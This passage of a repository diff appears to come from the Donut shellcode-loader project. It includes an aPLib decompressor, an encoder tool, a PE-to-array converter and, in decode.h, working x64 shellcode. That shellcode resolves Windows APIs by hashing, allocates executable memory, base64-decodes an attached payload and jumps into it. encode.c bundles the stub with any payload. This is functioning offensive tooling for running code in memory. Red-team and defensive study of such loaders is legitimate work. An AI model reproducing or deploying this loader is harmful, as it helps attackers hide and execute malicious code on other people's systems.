909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
+166
-0
loader/depack.c less more
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #include "depack.h"
12
13 /* internal data structure */
14 struct APDSTATE {
15 const unsigned char *source;
16 unsigned char *destination;
17 unsigned int tag;
18 unsigned int bitcount;
19 };
20
21 static unsigned int aP_getbit(struct APDSTATE *ud)
22 {
23 unsigned int bit;
24
25 /* check if tag is empty */
26 if (!ud->bitcount--) {
27 /* load next tag */
28 ud->tag = *ud->source++;
29 ud->bitcount = 7;
30 }
31
32 /* shift bit out of tag */
33 bit = (ud->tag >> 7) & 0x01;
34 ud->tag <<= 1;
35
36 return bit;
37 }
38
39 static unsigned int aP_getgamma(struct APDSTATE *ud)
40 {
41 unsigned int result = 1;
42
43 /* input gamma2-encoded bits */
44 do {
45 result = (result << 1) + aP_getbit(ud);
46 } while (aP_getbit(ud));
47
48 return result;
49 }
50
51 unsigned int aP_depack(const void *source, void *destination)
52 {
53 struct APDSTATE ud;
54 unsigned int offs, len, R0, LWM;
55 int done;
56 int i;
57
58 ud.source = (const unsigned char *) source;
59 ud.destination = (unsigned char *) destination;
60 ud.bitcount = 0;
61
62 R0 = (unsigned int) -1;
63 LWM = 0;
64 done = 0;
65
66 /* first byte verbatim */
67 *ud.destination++ = *ud.source++;
68
69 /* main decompression loop */
70 while (!done) {
71 if (aP_getbit(&ud)) {
72 if (aP_getbit(&ud)) {
73 if (aP_getbit(&ud)) {
74 offs = 0;
75
76 for (i = 4; i; i--) {
77 offs = (offs << 1) + aP_getbit(&ud);
78 }
79
80 if (offs) {
81 *ud.destination = *(ud.destination - offs);
82 ud.destination++;
83 }
84 else {
85 *ud.destination++ = 0x00;
86 }
87
88 LWM = 0;
89 }
90 else {
91 offs = *ud.source++;
92
93 len = 2 + (offs & 0x0001);
94
95 offs >>= 1;
96
97 if (offs) {
98 for (; len; len--) {
99 *ud.destination = *(ud.destination - offs);
100 ud.destination++;
101 }
102 }
103 else {
104 done = 1;
105 }
106
107 R0 = offs;
108 LWM = 1;
109 }
110 }
111 else {
112 offs = aP_getgamma(&ud);
113
114 if ((LWM == 0) && (offs == 2)) {
115 offs = R0;
116
117 len = aP_getgamma(&ud);
118
119 for (; len; len--) {
120 *ud.destination = *(ud.destination - offs);
121 ud.destination++;
122 }
123 }
124 else {
125 if (LWM == 0) {
126 offs -= 3;
127 }
128 else {
129 offs -= 2;
130 }
131
132 offs <<= 8;
133 offs += *ud.source++;
134
135 len = aP_getgamma(&ud);
136
137 if (offs >= 32000) {
138 len++;
139 }
140 if (offs >= 1280) {
141 len++;
142 }
143 if (offs < 128) {
144 len += 2;
145 }
146
147 for (; len; len--) {
148 *ud.destination = *(ud.destination - offs);
149 ud.destination++;
150 }
151
152 R0 = offs;
153 }
154
155 LWM = 1;
156 }
157 }
158 else {
159 *ud.destination++ = *ud.source++;
160 LWM = 0;
161 }
162 }
163
164 return (unsigned int) (ud.destination - (unsigned char *) destination);
165 }
+3
-0
loader/encode/README.txt less more
0
1 compile: cl encode.c mmap-windows.c
2 usage: encode loader.bin base64.txt
+155
-0
loader/encode/decode.h less more
0
1 // Target architecture : X86 64
2
3 #define DECODE_SIZE 353
4
5 char DECODE[] = {
6 /* 0000 */ "\x56" /* push rsi */
7 /* 0001 */ "\x53" /* push rbx */
8 /* 0002 */ "\x57" /* push rdi */
9 /* 0003 */ "\x55" /* push rbp */
10 /* 0004 */ "\xeb\x0a" /* jmp 0x10 */
11 /* 0006 */ "\x5d" /* pop rbp */
12 /* 0007 */ "\x31\xc0" /* xor eax, eax */
13 /* 0009 */ "\xb0\x9b" /* mov al, 0x9b */
14 /* 000B */ "\x48\x01\xe8" /* add rax, rbp */
15 /* 000E */ "\xff\xe0" /* jmp rax */
16 /* 0010 */ "\xe8\xf1\xff\xff\xff" /* call 6 */
17 /* 0015 */ "\x56" /* push rsi */
18 /* 0016 */ "\x53" /* push rbx */
19 /* 0017 */ "\x57" /* push rdi */
20 /* 0018 */ "\x55" /* push rbp */
21 /* 0019 */ "\x41\x89\xc0" /* mov r8d, eax */
22 /* 001C */ "\xeb\x72" /* jmp 0x90 */
23 /* 001E */ "\x41\x59" /* pop r9 */
24 /* 0020 */ "\x6a\x60" /* push 0x60 */
25 /* 0022 */ "\x41\x5b" /* pop r11 */
26 /* 0024 */ "\x65\x49\x8b\x03" /* mov rax, qword ptr gs:[r11] */
27 /* 0028 */ "\x48\x8b\x40\x18" /* mov rax, qword ptr [rax + 0x18] */
28 /* 002C */ "\x48\x8b\x78\x10" /* mov rdi, qword ptr [rax + 0x10] */
29 /* 0030 */ "\xeb\x03" /* jmp 0x35 */
30 /* 0032 */ "\x48\x8b\x3f" /* mov rdi, qword ptr [rdi] */
31 /* 0035 */ "\x48\x8b\x5f\x30" /* mov rbx, qword ptr [rdi + 0x30] */
32 /* 0039 */ "\x48\x85\xdb" /* test rbx, rbx */
33 /* 003C */ "\x74\x4b" /* je 0x89 */
34 /* 003E */ "\x8b\x73\x3c" /* mov esi, dword ptr [rbx + 0x3c] */
35 /* 0041 */ "\x44\x01\xde" /* add esi, r11d */
36 /* 0044 */ "\x8b\x4c\x33\x28" /* mov ecx, dword ptr [rbx + rsi + 0x28] */
37 /* 0048 */ "\x67\xe3\xe7" /* jecxz 0x32 */
38 /* 004B */ "\x48\x8d\x74\x0b\x0c" /* lea rsi, qword ptr [rbx + rcx + 0xc] */
39 /* 0050 */ "\xad" /* lodsd eax, dword ptr [rsi] */
40 /* 0051 */ "\x41\xff\xd1" /* call r9 */
41 /* 0054 */ "\x50" /* push rax */
42 /* 0055 */ "\x41\x5a" /* pop r10 */
43 /* 0057 */ "\xad" /* lodsd eax, dword ptr [rsi] */
44 /* 0058 */ "\xad" /* lodsd eax, dword ptr [rsi] */
45 /* 0059 */ "\xad" /* lodsd eax, dword ptr [rsi] */
46 /* 005A */ "\x91" /* xchg eax, ecx */
47 /* 005B */ "\x67\xe3\xd4" /* jecxz 0x32 */
48 /* 005E */ "\xad" /* lodsd eax, dword ptr [rsi] */
49 /* 005F */ "\x92" /* xchg eax, edx */
50 /* 0060 */ "\x48\x01\xda" /* add rdx, rbx */
51 /* 0063 */ "\xad" /* lodsd eax, dword ptr [rsi] */
52 /* 0064 */ "\x95" /* xchg eax, ebp */
53 /* 0065 */ "\x48\x01\xdd" /* add rbp, rbx */
54 /* 0068 */ "\xad" /* lodsd eax, dword ptr [rsi] */
55 /* 0069 */ "\x96" /* xchg eax, esi */
56 /* 006A */ "\x48\x01\xde" /* add rsi, rbx */
57 /* 006D */ "\x48\x8b\x44\x8d\xfc" /* mov rax, qword ptr [rbp + rcx*4 - 4] */
58 /* 0072 */ "\x41\xff\xd1" /* call r9 */
59 /* 0075 */ "\x44\x01\xd0" /* add eax, r10d */
60 /* 0078 */ "\x44\x39\xc0" /* cmp eax, r8d */
61 /* 007B */ "\xe0\xf0" /* loopne 0x6d */
62 /* 007D */ "\x75\xb3" /* jne 0x32 */
63 /* 007F */ "\x0f\xb7\x04\x4e" /* movzx eax, word ptr [rsi + rcx*2] */
64 /* 0083 */ "\x8b\x04\x82" /* mov eax, dword ptr [rdx + rax*4] */
65 /* 0086 */ "\x48\x01\xc3" /* add rbx, rax */
66 /* 0089 */ "\x48\x93" /* xchg rax, rbx */
67 /* 008B */ "\x5d" /* pop rbp */
68 /* 008C */ "\x5f" /* pop rdi */
69 /* 008D */ "\x5b" /* pop rbx */
70 /* 008E */ "\x5e" /* pop rsi */
71 /* 008F */ "\xc3" /* ret */
72 /* 0090 */ "\xe8\x89\xff\xff\xff" /* call 0x1e */
73 /* 0095 */ "\x52" /* push rdx */
74 /* 0096 */ "\x56" /* push rsi */
75 /* 0097 */ "\x96" /* xchg eax, esi */
76 /* 0098 */ "\x48\x01\xde" /* add rsi, rbx */
77 /* 009B */ "\x31\xc0" /* xor eax, eax */
78 /* 009D */ "\x99" /* cdq */
79 /* 009E */ "\xac" /* lodsb al, byte ptr [rsi] */
80 /* 009F */ "\x08\xc0" /* or al, al */
81 /* 00A1 */ "\x74\x09" /* je 0xac */
82 /* 00A3 */ "\x0c\x20" /* or al, 0x20 */
83 /* 00A5 */ "\x01\xc2" /* add edx, eax */
84 /* 00A7 */ "\xc1\xca\x08" /* ror edx, 8 */
85 /* 00AA */ "\xeb\xf2" /* jmp 0x9e */
86 /* 00AC */ "\x92" /* xchg eax, edx */
87 /* 00AD */ "\x5e" /* pop rsi */
88 /* 00AE */ "\x5a" /* pop rdx */
89 /* 00AF */ "\xc3" /* ret */
90 /* 00B0 */ "\x48\x99" /* cqo */
91 /* 00B2 */ "\xb2\xb1" /* mov dl, 0xb1 */
92 /* 00B4 */ "\x48\x01\xd0" /* add rax, rdx */
93 /* 00B7 */ "\x48\x83\xec\x78" /* sub rsp, 0x78 */
94 /* 00BB */ "\x54" /* push rsp */
95 /* 00BC */ "\x5b" /* pop rbx */
96 /* 00BD */ "\x48\x8d\x7b\x48" /* lea rdi, qword ptr [rbx + 0x48] */
97 /* 00C1 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
98 /* 00C3 */ "\xb8\x39\x81\x4f\x45" /* mov eax, 0x454f8139 */
99 /* 00C8 */ "\xff\xd5" /* call rbp */
100 /* 00CA */ "\x48\xab" /* stosq qword ptr [rdi], rax */
101 /* 00CC */ "\xb8\xd7\x0e\xf5\xe0" /* mov eax, 0xe0f50ed7 */
102 /* 00D1 */ "\xff\xd5" /* call rbp */
103 /* 00D3 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
104 /* 00D5 */ "\xb8\x57\x6d\x60\x46" /* mov eax, 0x46606d57 */
105 /* 00DA */ "\xff\xd5" /* call rbp */
106 /* 00DC */ "\x48\xab" /* stosq qword ptr [rdi], rax */
107 /* 00DE */ "\xb8\xb1\x64\x4a\x3f" /* mov eax, 0x3f4a64b1 */
108 /* 00E3 */ "\xff\xd5" /* call rbp */
109 /* 00E5 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
110 /* 00E7 */ "\x31\xc0" /* xor eax, eax */
111 /* 00E9 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
112 /* 00ED */ "\xff\x53\x58" /* call qword ptr [rbx + 0x58] */
113 /* 00F0 */ "\x89\x43\x44" /* mov dword ptr [rbx + 0x44], eax */
114 /* 00F3 */ "\x31\xd2" /* xor edx, edx */
115 /* 00F5 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
116 /* 00F9 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
117 /* 00FD */ "\x48\x89\x53\x38" /* mov qword ptr [rbx + 0x38], rdx */
118 /* 0101 */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
119 /* 0105 */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
120 /* 0109 */ "\x4d\x31\xc9" /* xor r9, r9 */
121 /* 010C */ "\x6a\x07" /* push 7 */
122 /* 010E */ "\x41\x58" /* pop r8 */
123 /* 0110 */ "\x92" /* xchg eax, edx */
124 /* 0111 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
125 /* 0115 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
126 /* 0118 */ "\x6a\x40" /* push 0x40 */
127 /* 011A */ "\x41\x59" /* pop r9 */
128 /* 011C */ "\x6a\x30" /* push 0x30 */
129 /* 011E */ "\x41\x58" /* pop r8 */
130 /* 0120 */ "\x49\xc1\xe0\x08" /* shl r8, 8 */
131 /* 0124 */ "\x8b\x53\x38" /* mov edx, dword ptr [rbx + 0x38] */
132 /* 0127 */ "\x31\xc9" /* xor ecx, ecx */
133 /* 0129 */ "\xff\x53\x60" /* call qword ptr [rbx + 0x60] */
134 /* 012C */ "\x48\x89\x43\x3c" /* mov qword ptr [rbx + 0x3c], rax */
135 /* 0130 */ "\x31\xd2" /* xor edx, edx */
136 /* 0132 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
137 /* 0136 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
138 /* 013A */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
139 /* 013E */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
140 /* 0142 */ "\x50" /* push rax */
141 /* 0143 */ "\x41\x59" /* pop r9 */
142 /* 0145 */ "\x6a\x07" /* push 7 */
143 /* 0147 */ "\x41\x58" /* pop r8 */
144 /* 0149 */ "\x8b\x53\x44" /* mov edx, dword ptr [rbx + 0x44] */
145 /* 014C */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
146 /* 0150 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
147 /* 0153 */ "\x48\x8b\x43\x3c" /* mov rax, qword ptr [rbx + 0x3c] */
148 /* 0157 */ "\x48\x83\xc4\x78" /* add rsp, 0x78 */
149 /* 015B */ "\x5d" /* pop rbp */
150 /* 015C */ "\x5f" /* pop rdi */
151 /* 015D */ "\x5b" /* pop rbx */
152 /* 015E */ "\x5e" /* pop rsi */
153 /* 015F */ "\xff\xe0" /* jmp rax */
154 };
+119
-0
loader/encode/encode.c less more
0
1
2 // test unit for decode.asm
3 // odzhan
4
5 #include <stdint.h>
6 #include <stdio.h>
7 #include <stdlib.h>
8 #include <string.h>
9 #include <sys/stat.h>
10 #include <inttypes.h>
11 #include <fcntl.h>
12
13 #if defined(_WIN32) || defined(_WIN64)
14 #define WINDOWS
15 #include <windows.h>
16 #include "mmap.h"
17 #if defined(_MSC_VER)
18 #pragma comment(lib, "advapi32.lib")
19 #pragma comment(lib, "user32.lib")
20 #pragma comment(lib, "crypt32.lib")
21 #endif
22 #else
23 #define LINUX
24 #include <unistd.h>
25 #include <sys/types.h>
26 #include <sys/mman.h>
27 #endif
28
29 #include "decode.h"
30
31 uint32_t hash_string(const char *str) {
32 char c;
33 uint32_t h = 0;
34
35 do {
36 c = *str++;
37 if(c == 0) break;
38 h += (c | 0x20);
39 h = (h << 32-8) | (h >> 8);
40 } while(c != 0);
41
42 return h;
43 }
44
45 void bin2hex(void *bin, int len) {
46 int i;
47 uint8_t *p=(uint8_t*)bin;
48
49 for(i=0; i<8; i++) printf(" %02x", p[i]);
50 }
51
52 int main(int argc, char *argv[]) {
53 struct stat fs;
54 int in;
55 FILE *out;
56 char *infile, *outfile;
57 DWORD inlen, outlen;
58 PVOID outbuf, inbuf;
59
60 if(argc != 3) {
61 printf("\nusage: encode <infile> <outfile>\n");
62 return 0;
63 }
64
65 infile = argv[1];
66 outfile = argv[2];
67
68 if(stat(infile, &fs) != 0) {
69 printf("unable to access %s\n", infile);
70 return -1;
71 }
72
73 in = open(infile, O_RDONLY);
74 if(in < 0) {
75 printf("unable to open %s.\n", infile);
76 return -1;
77 }
78
79 out = fopen(outfile, "wb");
80 if(out < 0) {
81 printf("unable to open %s for writing.\n", outfile);
82 close(in);
83 return -1;
84 }
85
86 inlen = fs.st_size;
87 inbuf = mmap(NULL, inlen, PROT_READ, MAP_PRIVATE, in, 0);
88
89 if(inbuf != NULL) {
90 outlen = 0;
91 if(CryptBinaryToString(inbuf, inlen,
92 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &outlen))
93 {
94 outbuf = calloc(1, outlen + DECODE_SIZE + 8);
95 if(outbuf != NULL) {
96 if(CryptBinaryToString(inbuf, inlen,
97 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, outbuf, &outlen))
98 {
99 fwrite(DECODE, 1, DECODE_SIZE, out);
100 fwrite(outbuf, 1, outlen, out);
101 } else {
102 printf("CryptBinaryToString failed.\n");
103 }
104 free(outbuf);
105 } else {
106 printf("unable to allocate memory.\n");
107 }
108 } else {
109 printf("unable to obtain length\n");
110 }
111 munmap(inbuf, inlen);
112 } else {
113 printf("unable to map\n");
114 }
115 fclose(out);
116 close(in);
117 return 0;
118 }
loader/encode/encode.exe less more
Binary diff not shown
+73
-0
loader/encode/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
+45
-0
loader/encode/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+368
-0
loader/exe2h/exe2h.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 void bin2go(void* map, char* fname, void* bin, uint32_t len) {
192 char label[32], file[32], * str;
193 uint32_t i;
194 uint8_t* p = (uint8_t*)bin;
195 FILE* fd;
196
197 memset(label, 0, sizeof(label));
198 memset(file, 0, sizeof(file));
199
200 #if defined(WINDOWS)
201 str = PathFindFileName(fname);
202 #else
203 str = basename(fname);
204 #endif
205 for (i = 0; str[i] != 0 && i < 16; i++) {
206 if (str[i] == '.') {
207 file[i] = label[i] = '_';
208 }
209 else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214 if (map != NULL) {
215 strcat(label, is32(map) ? "_X86" : "_X64");
216 strcat(file, is32(map) ? "_x86" : "_x64");
217 }
218 strcat(file, ".go");
219
220 fd = fopen(file, "wb");
221
222 if (fd != NULL) {
223 fprintf(fd, "package donut\n\n// %s - stub for EXE PE files\nvar %s = []byte{\n", label, label);
224
225 for (i = 0; i < len; i++) {
226 if (!(i % 12)) fprintf(fd, "\n ");
227 fprintf(fd, "0x%02x", p[i]);
228 if ((i + 1) != len) fprintf(fd, ", ");
229 }
230 fprintf(fd, "};\n\n");
231 fclose(fd);
232 printf(" [ saved code to %s\n", file);
233 }
234 else printf(" [ unable to create file : %s\n", file);
235 }
236
237
238 /**
239 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
240 char label[32], file[32], *str;
241 uint32_t i;
242 uint32_t *p=(uint32_t*)bin;
243 FILE *fd;
244
245 memset(label, 0, sizeof(label));
246 memset(file, 0, sizeof(file));
247
248 #if defined(WINDOWS)
249 str = PathFindFileName(fname);
250 #else
251 str = basename(fname);
252 #endif
253 for(i=0; str[i] != 0 && i < 16;i++) {
254 if(str[i] == '.') {
255 file[i] = label[i] = '_';
256 } else {
257 label[i] = toupper(str[i]);
258 file[i] = tolower(str[i]);
259 }
260 }
261
262 strcat(file, ".h");
263
264 fd = fopen(file, "wb");
265
266 if(fd != NULL) {
267 // align up by 4
268 len = (len & -4) + 4;
269 len >>= 2;
270
271 // declare the array
272 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
273
274 // initialize array
275 for(i=0; i<len; i++) {
276 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
277 }
278 fclose(fd);
279 printf(" [ Saved array to %s\n", file);
280 } else printf(" [ unable to create file : %s\n", file);
281 }
282 */
283 // structure of COFF (.obj) file
284
285 //--------------------------//
286 // IMAGE_FILE_HEADER //
287 //--------------------------//
288 // IMAGE_SECTION_HEADER //
289 // * num sections //
290 //--------------------------//
291 // //
292 // //
293 // //
294 // section data //
295 // * num sections //
296 // //
297 // //
298 //--------------------------//
299 // IMAGE_SYMBOL //
300 // * num symbols //
301 //--------------------------//
302 // string table //
303 //--------------------------//
304
305 int main (int argc, char *argv[]) {
306 int fd, i;
307 struct stat fs;
308 uint8_t *map, *cs;
309 PIMAGE_SECTION_HEADER sh;
310 //PIMAGE_FILE_HEADER fh;
311 //PIMAGE_COFF_SYMBOLS_HEADER csh;
312 uint32_t ofs, len;
313
314 if (argc != 2) {
315 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
316 return 0;
317 }
318
319 // open file for reading
320 fd = open(argv[1], O_RDONLY);
321
322 if(fd == 0) {
323 printf(" [ unable to open %s\n", argv[1]);
324 return 0;
325 }
326 // if file has some data
327 if(fstat(fd, &fs) == 0) {
328 // map into memory
329 map = (uint8_t*)mmap(NULL, fs.st_size,
330 PROT_READ, MAP_PRIVATE, fd, 0);
331 if(map != NULL) {
